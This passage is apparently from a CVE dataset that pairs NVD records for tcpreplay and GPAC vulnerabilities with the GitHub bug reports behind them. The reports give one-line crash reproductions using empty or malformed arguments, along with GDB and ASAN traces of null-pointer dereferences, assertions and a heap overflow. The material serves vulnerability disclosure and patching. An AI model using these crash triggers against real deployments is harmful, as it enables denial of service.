"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/785 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `parse_endpoints()` when the user passes empty endpoints string to `tcprewrite` with option `--endpoints`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Generate cache file `$ ./tcpprep --port --pcap=./test.pcap --cachefile=./test.cache`
The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`.
3. Run Command `$ ./tcprewrite --endpoints="" -i ./test.pcap -o /dev/null --cachefile=./test.cache`
**Expected behavior**
Program crashes with Segmentation fault.
The GDB report is:
```
$ gdb --args ./bin_normal/bin/tcprewrite --endpoints="" -i ./code/test/test.pcap -o /dev/null --cachefile=./test.cache
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bin_normal/bin/tcprewrite...
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --endpoints= -i ./code/test/test.pcap -o /dev/null --cachefile=./test.cache
Program received signal SIGSEGV, Segmentation fault.
0x000055555556fde2 in strlcat (dst=0x7fffffffc0aa "", src=0x0, dsize=92) at strlcat.c:45
45 while (*src != '\0') {
(gdb) bt
#0 0x000055555556fde2 in strlcat (dst=0x7fffffffc0aa "", src=0x0, dsize=92) at strlcat.c:45
#1 0x000055555556b6f0 in parse_endpoints (cidrmap1=0x555555580850, cidrmap2=0x555555580858, optarg=0x7fffffffc654 "") at cidr.c:367
#2 0x000055555555b51c in tcpedit_post_args (tcpedit=0x55555557fff0) at parse_args.c:243
#3 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2f0) at tcprewrite.c:89
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
``` | [Bug] NULL Pointer Dereference in parse_endpoints() at cidr.c:367 | https://api.github.com/repos/appneta/tcpreplay/issues/785/comments | 1 | 2023-03-01T13:05:12Z | 2023-06-05T02:11:48Z | https://github.com/appneta/tcpreplay/issues/785 | 1,604,942,692 | 785 |
CVE-2023-27786 | 2023-03-16T15:15:10.877 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the macinstring function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/782"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/pull/783"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/782 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `macinstring()` when the user passes empty mac string to `tcpprep` in Source MAC split mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcpprep -e "" --pcap=./test.pcap --cachefile=/dev/null`
The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`.
**Expected behavior**
Program crashes with Segmentation fault.
The GDB report:
```
$ gdb --args ./bin_normal/bin/tcpprep -e "" --pcap=./code/test/test.pcap --cachefile=/dev/null
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep -e '' --pcap=./code/test/test.pcap --cachefile=/dev/null
Program received signal SIGSEGV, Segmentation fault.
0x0000555555562b50 in macinstring (macstring=0x55555558dbf0 "", mac=0x55555558f0e6 "\370\036\337\345\204:\b") at mac.c:120
120 if (strlen(tempstr)) {
(gdb) bt
#0 0x0000555555562b50 in macinstring (macstring=0x55555558dbf0 "", mac=0x55555558f0e6 "\370\036\337\345\204:\b") at mac.c:120
#1 0x00005555555596b6 in process_raw_packets (pcap=0x55555558ee40) at tcpprep.c:450
#2 0x0000555555558d23 in main (argc=5, argv=0x7fffffffc2d8) at tcpprep.c:144
```
The ASAN report:
```
$ ./bin_asan/bin/tcpprep -e "" --pcap=./code/test/test.pcap --cachefile=/dev/null
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3017398==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000516fd4 bp 0x7ffe41169c70 sp 0x7ffe41169b80 T0)
==3017398==The signal is caused by a READ memory access.
==3017398==Hint: address points to the zero page.
#0 0x516fd4 in macinstring /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/common/../../../code/src/common/mac.c:120:9
#1 0x4fe345 in process_raw_packets /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/../../code/src/tcpprep.c:450:25
#2 0x4fe345 in main /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/../../code/src/tcpprep.c:144:23
#3 0x7fb921f310b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41f4ed in _start (/home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_asan/bin/tcpprep+0x41f4ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/common/../../../code/src/common/mac.c:120:9 in macinstring
==3017398==ABORTING
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
```
| [Bug] NULL Pointer Dereference in macinstring() at mac.c:120 | https://api.github.com/repos/appneta/tcpreplay/issues/782/comments | 2 | 2023-03-01T08:19:59Z | 2023-06-05T02:10:12Z | https://github.com/appneta/tcpreplay/issues/782 | 1,604,494,155 | 782 |
CVE-2023-27787 | 2023-03-16T15:15:10.940 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse_list function at the list.c:81 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/788"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/788 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `parse_list()` when the user passes specific size (i.e., 2) of include string to `tcpprep` with option `--include`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcpprep --include="P "`
**Expected behavior**
Program crashes with Segmentation fault.
```
$ gdb --args ./bin_normal/bin/tcpprep --include="P "
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep --include=P\
Program received signal SIGSEGV, Segmentation fault.
__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.
(gdb) bt
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
#1 0x00007ffff7e4982b in __GI___regexec (preg=0x7fffffffd650, string=0x0, nmatch=0, pmatch=0x0, eflags=0) at regexec.c:210
#2 0x000055555555ed19 in parse_list (listdata=0x55555556db38, ourstr=0x55555558dbf2 "") at list.c:81
#3 0x00005555555614a7 in parse_xX_str (xX=0x55555556db30, str=0x55555558dbf2 "", bpf=0x55555556db50) at xX.c:84
#4 0x00005555555581fc in doOptInclude (pOptions=0x55555556bc00 <tcpprepOptions>, pOptDesc=0x55555556b3c8 <optDesc+936>) at tcpprep_opts.c:1411
#5 0x00007ffff7f4011e in ?? () from /lib/x86_64-linux-gnu/libopts.so.25
#6 0x00007ffff7f48964 in ?? () from /lib/x86_64-linux-gnu/libopts.so.25
#7 0x00007ffff7f4b7c8 in optionProcess () from /lib/x86_64-linux-gnu/libopts.so.25
#8 0x000055555555899c in main (argc=2, argv=0x7fffffffde88) at tcpprep.c:89
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
``` | [Bug] NULL Pointer Dereference in parse_list() at list.c:81 | https://api.github.com/repos/appneta/tcpreplay/issues/788/comments | 1 | 2023-03-02T01:58:00Z | 2023-06-05T02:13:05Z | https://github.com/appneta/tcpreplay/issues/788 | 1,605,978,257 | 788 |
CVE-2023-27788 | 2023-03-16T15:15:11.000 | An issue found in TCPrewrite v.4.4.3 allows a remote attacker to cause a denial of service via the ports2PORT function at the portmap.c:69 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/786"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/786 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `ports2PORT()` when the user passes empty portmap string to `tcprewrite` with option `--portmap`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcprewrite --portmap="" -i ./test.pcap -o /dev/null`
The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`.
**Expected behavior**
Program reports assertion failure and is terminated.
The GDB report:
```
$ gdb --args ./bin_normal/bin/tcprewrite --portmap="" -i ./code/test/test.pcap -o /dev/null
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --portmap= -i ./code/test/test.pcap -o /dev/null
tcprewrite: portmap.c:69: ports2PORT: Assertion `ports' failed.
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d6d859 in __GI_abort () at abort.c:79
#2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x55555557242a "ports", file=0x555555572420 "portmap.c", line=69, function=<optimized out>)
at assert.c:92
#3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x55555557242a "ports", file=0x555555572420 "portmap.c", line=69, function=0x5555555725c0 <__PRETTY_FUNCTION__.6999> "ports2PORT") at assert.c:101
#4 0x000055555555e28d in ports2PORT (ports=0x0) at portmap.c:69
#5 0x000055555555e83a in parse_portmap (portmap=0x555555580848, ourstr=0x55555557e2a0 "") at portmap.c:197
#6 0x000055555555b2e3 in tcpedit_post_args (tcpedit=0x55555557ffc0) at parse_args.c:191
#7 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2f8) at tcprewrite.c:89
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
```
| [Bug] Reachable assertion in ports2PORT() at portmap.c:69 | https://api.github.com/repos/appneta/tcpreplay/issues/786/comments | 1 | 2023-03-01T13:11:58Z | 2023-06-05T02:12:13Z | https://github.com/appneta/tcpreplay/issues/786 | 1,604,953,701 | 786 |
CVE-2023-27789 | 2023-03-16T15:15:11.057 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the cidr2cidr function at the cidr.c:178 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/784"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/pull/783"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/784 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `cidr2cidr()` when the user passes empty cidr string to `tcpprep` in CIDR-split mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcpprep --cidr="" --pcap=./test.pcap --cachefile=/dev/null`
The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`.
**Expected behavior**
Program reports assertion failure and is terminated.
The GDB report:
```
$ gdb --args ./bin_normal/bin/tcpprep --cidr="" --pcap=./code/test/test.pcap --cachefile=/dev/null
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep --cidr= --pcap=./code/test/test.pcap --cachefile=/dev/null
tcpprep: cidr.c:178: cidr2cidr: Assertion `cidr' failed.
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d6d859 in __GI_abort () at abort.c:79
#2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x555555565d1e "cidr", file=0x555555565d14 "cidr.c", line=178, function=<optimized out>)
at assert.c:92
#3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x555555565d1e "cidr", file=0x555555565d14 "cidr.c", line=178, function=0x555555565dd0 <__PRETTY_FUNCTION__.6522> "cidr2cidr") at assert.c:101
#4 0x000055555555daa4 in cidr2cidr (cidr=0x0) at cidr.c:178
#5 0x000055555555de56 in parse_cidr (cidrdata=0x55555556db20, cidrin=0x55555558dbf0 "", delim=0x555555564d61 ",") at cidr.c:299
#6 0x0000555555557e6c in doOptCidr (pOptions=0x55555556bc00 <tcpprepOptions>, pOptDesc=0x55555556b0f0 <optDesc+208>) at tcpprep_opts.c:1217
#7 0x00007ffff7f4111e in ?? () from /lib/x86_64-linux-gnu/libopts.so.25
#8 0x00007ffff7f49964 in ?? () from /lib/x86_64-linux-gnu/libopts.so.25
#9 0x00007ffff7f4c7c8 in optionProcess () from /lib/x86_64-linux-gnu/libopts.so.25
#10 0x000055555555899c in main (argc=4, argv=0x7fffffffc2d8) at tcpprep.c:89
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
```
| [Bug] Reachable assertion in cidr2cidr() at cidr.c:178 | https://api.github.com/repos/appneta/tcpreplay/issues/784/comments | 1 | 2023-03-01T13:03:02Z | 2023-06-05T02:10:42Z | https://github.com/appneta/tcpreplay/issues/784 | 1,604,938,815 | 784 |
CVE-2023-1448 | 2023-03-17T07:15:12.093 | A vulnerability, which was classified as problematic, was found in GPAC 2.3-DEV-rev35-gbbca86917-master. This affects the function gf_m2ts_process_sdt of the file media_tools/mpegts.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223293 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2388"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/blob/main/gpac/3"
},
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.223293"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.223293"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2388 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
## version
```
MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer --enable-debug
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
complie and run
```
./configure --enable-sanitizer
make
./MP4Box -info poc
```
information reported by sanitizer
```
=================================================================
==4003817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001114 at pc 0x7fa5cde90b3b bp 0x7ffe09c26cd0 sp 0x7ffe09c26cc0
READ of size 1 at 0x603000001114 thread T0
#0 0x7fa5cde90b3a in gf_m2ts_process_sdt media_tools/mpegts.c:828
#1 0x7fa5cde8cb21 in gf_m2ts_section_complete media_tools/mpegts.c:623
#2 0x7fa5cde8ff0b in gf_m2ts_gather_section media_tools/mpegts.c:760
#3 0x7fa5cdeb0db9 in gf_m2ts_process_packet media_tools/mpegts.c:2703
#4 0x7fa5cdeb3125 in gf_m2ts_process_data media_tools/mpegts.c:2812
#5 0x7fa5cdeb8145 in gf_m2ts_probe_buffer media_tools/mpegts.c:3196
#6 0x7fa5cdeb886c in gf_m2ts_probe_data media_tools/mpegts.c:3251
#7 0x7fa5ceb1df9f in m2tsdmx_probe_data filters/dmx_m2ts.c:1438
#8 0x7fa5ce8d92a4 in gf_filter_pid_raw_new filter_core/filter.c:4210
#9 0x7fa5cec2cb68 in filein_process filters/in_file.c:492
#10 0x7fa5ce8c1be4 in gf_filter_process_task filter_core/filter.c:2828
#11 0x7fa5ce86c6d7 in gf_fs_thread_proc filter_core/filter_session.c:1859
#12 0x7fa5ce86fce8 in gf_fs_run filter_core/filter_session.c:2120
#13 0x7fa5cde7b742 in gf_media_import media_tools/media_import.c:1228
#14 0x55d5db4c09ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130
#15 0x55d5db47907d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302
